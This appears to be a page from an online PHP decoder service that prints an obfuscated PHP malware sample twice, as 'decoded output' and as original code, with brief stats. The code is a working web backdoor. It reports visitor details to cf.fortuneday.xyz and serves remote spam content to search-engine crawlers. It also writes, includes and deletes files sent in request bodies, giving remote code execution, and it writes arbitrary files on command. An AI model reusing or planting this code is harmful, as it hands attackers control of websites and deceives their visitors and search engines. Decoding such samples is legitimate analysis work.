Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$g38=base64_decode(ba..

Decoded Output download

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$g38=base64_decode(base64_decode("TWk0eUxqRTM="));$y40 = "cf.fortuneday.xyz";$c5 = base64_decode("MTAwMA==");$a48 = clientip();$q30 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$h36 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$q30i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$g46 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$n13 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$y14 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$p38 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$q34 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$n13,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$h36, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$q30, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$p38, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$g46, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$q30i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$y40, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$a48,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$y14);$q39= "proto=$p38&shost=$g46&ip=$a48&dbgroup=$c5&uri=$q30i";if (strlen($y14)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($q30i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$h36) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$q30) && @preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$q30i)))){        list($r14,$u18,$f15) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$y40.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$q39,$q34,$q39);    if (stripos($f15,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($r14); }    if (stripos($r14,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($r14,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($r14); }    if (stripos($r14,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($r14); }        if (stripos($r14,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($r14,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $r14); exit;}        if (strstr($r14,base64_decode("Wyxd"))){$y32 = explode(base64_decode("Wyxd"),$r14); $s37 = explode(base64_decode("LA=="),$y32[0]); $n36 = base64_decode(base64_decode("")); foreach($s37 as $q30l){ list($y6,$u18) = urlx($q30l,null,null,$y32[1]);$n36 .= $q30l.$y6; } exit($n36);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$r14)){$p44 = explode(base64_decode("Wyxd"),$r14); todk($p44[0],$p44[1]); if(file_exists($p44[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($r14,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($r14.base64_decode("Y2YuZm9ydHVuZWRheS54eXoxMDAw")); }    if ($u18 >= 400 && $u18 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($u18 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($r14!=base64_decode("")){ exit($r14); }}function urlx($q30l,$q34=null,$q39=null,$h36=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $u12 = curl_init();        curl_setopt($u12, CURLOPT_URL, $q30l); curl_setopt($u12, CURLOPT_FOLLOWLOCATION,1); curl_setopt($u12, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($u12, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($u12, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($u12, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($u12, CURLOPT_RETURNTRANSFER, 1);        ($q34===null)?base64_decode(base64_decode("")):curl_setopt($u12, CURLOPT_HTTPHEADER, $q34); ($h36===null||$h36===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($u12, CURLOPT_USERAGENT, $h36);        if ($q39!==null && $q39!==base64_decode("")) {curl_setopt($u12, CURLOPT_POST, 1); curl_setopt($u12, CURLOPT_POSTFIELDS, $q39); }        $z19 = curl_exec($u12);$u18 = curl_getinfo($u12,CURLINFO_HTTP_CODE); $f15 = curl_getinfo($u12,CURLINFO_CONTENT_TYPE);curl_close($u12);    } catch (Exception $f33) { }   if ($z19===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $z19 = @file_get_contents($q30l);        } catch (Exception $f33) { }    }    return array($z19,$u18,$f15);}function todk($t47,$n23){@file_put_contents($t47,$n23);}function clientip(){ $d14=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $d14 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $d14 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $d14 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($d14, base64_decode(base64_decode("TEE9PQ==")))) { $p44 = explode(base64_decode("LA=="), $d14); $d14 = $p44[0]; } return $d14;}?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$g38=base64_decode(base64_decode("TWk0eUxqRTM="));$y40 = "cf.fortuneday.xyz";$c5 = base64_decode("MTAwMA==");$a48 = clientip();$q30 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$h36 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$q30i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$g46 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$n13 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$y14 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$p38 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$q34 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$n13,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$h36, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$q30, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$p38, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$g46, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$q30i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$y40, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$a48,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$y14);$q39= "proto=$p38&shost=$g46&ip=$a48&dbgroup=$c5&uri=$q30i";if (strlen($y14)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($q30i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$h36) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$q30) && @preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$q30i)))){        list($r14,$u18,$f15) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$y40.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$q39,$q34,$q39);    if (stripos($f15,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($r14); }    if (stripos($r14,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($r14,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($r14); }    if (stripos($r14,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($r14); }        if (stripos($r14,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($r14,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $r14); exit;}        if (strstr($r14,base64_decode("Wyxd"))){$y32 = explode(base64_decode("Wyxd"),$r14); $s37 = explode(base64_decode("LA=="),$y32[0]); $n36 = base64_decode(base64_decode("")); foreach($s37 as $q30l){ list($y6,$u18) = urlx($q30l,null,null,$y32[1]);$n36 .= $q30l.$y6; } exit($n36);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$r14)){$p44 = explode(base64_decode("Wyxd"),$r14); todk($p44[0],$p44[1]); if(file_exists($p44[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($r14,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($r14.base64_decode("Y2YuZm9ydHVuZWRheS54eXoxMDAw")); }    if ($u18 >= 400 && $u18 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($u18 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($r14!=base64_decode("")){ exit($r14); }}function urlx($q30l,$q34=null,$q39=null,$h36=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $u12 = curl_init();        curl_setopt($u12, CURLOPT_URL, $q30l); curl_setopt($u12, CURLOPT_FOLLOWLOCATION,1); curl_setopt($u12, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($u12, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($u12, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($u12, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($u12, CURLOPT_RETURNTRANSFER, 1);        ($q34===null)?base64_decode(base64_decode("")):curl_setopt($u12, CURLOPT_HTTPHEADER, $q34); ($h36===null||$h36===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($u12, CURLOPT_USERAGENT, $h36);        if ($q39!==null && $q39!==base64_decode("")) {curl_setopt($u12, CURLOPT_POST, 1); curl_setopt($u12, CURLOPT_POSTFIELDS, $q39); }        $z19 = curl_exec($u12);$u18 = curl_getinfo($u12,CURLINFO_HTTP_CODE); $f15 = curl_getinfo($u12,CURLINFO_CONTENT_TYPE);curl_close($u12);    } catch (Exception $f33) { }   if ($z19===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $z19 = @file_get_contents($q30l);        } catch (Exception $f33) { }    }    return array($z19,$u18,$f15);}function todk($t47,$n23){@file_put_contents($t47,$n23);}function clientip(){ $d14=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $d14 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $d14 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $d14 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($d14, base64_decode(base64_decode("TEE9PQ==")))) { $p44 = explode(base64_decode("LA=="), $d14); $d14 = $p44[0]; } return $d14;}?>

Function Calls

set_time_limit 1
error_reporting 1
ignore_user_abort 1

Variables

None

Stats

MD5 f47d14ac676013203de1de2b36684476
Eval Count 0
Decode Time 92 ms